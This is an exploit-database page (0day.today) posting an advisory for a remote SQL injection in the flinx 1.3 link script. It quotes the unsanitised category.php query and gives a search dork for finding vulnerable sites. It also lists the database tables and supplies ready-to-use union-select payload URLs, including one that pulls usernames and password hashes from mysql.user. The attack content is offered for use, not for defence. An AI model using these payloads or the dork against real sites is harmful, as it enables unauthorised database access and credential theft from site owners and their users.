0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability
================================================================= flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability ================================================================= -------------------------------------------------------------- H-T Team [ HouSSaMix + ToXiC350 + RxH ] -------------------------------------------------------------- # Author : Houssamix From H-T Team # Script : flinx 1.3 & below # BUG : Remote SQL Injection Vulnerability # Dork : Powered by Flinx ## Vulnerable CODE : ~~~~~~~~ category.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <? $query="SELECT linkID FROM $table_link WHERE relCatID=$id"; $queryl=mysql_query($query); $count=mysql_numrows($queryl); $result=mysql_query("SELECT name FROM $table_cat WHERE catID=$id"); if ($row=mysql_fetch_array($result)){ do{ ?> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Exploit : [Target.il]/[flinx_path]/category.php?id=[SQL-CODE] tables and columns names => table : flinx_cat columns : name / catid => table : flinx_link columns : name / url / image / relCatID / width / height exemple : http://site.com/flinx/category.php?id=-999 union select name from flinx_cat-- we can also try get user and password from mysql.user : our user needs to be root@localhost or administrator mysql, check: http://site.com/flinx/category.php?id=-999/**/union/**/select/**/user()/* user and password from mysql.user: http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/**/mysql.user/* # Gr33tz : CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers # 0day.today [2024-11-16] #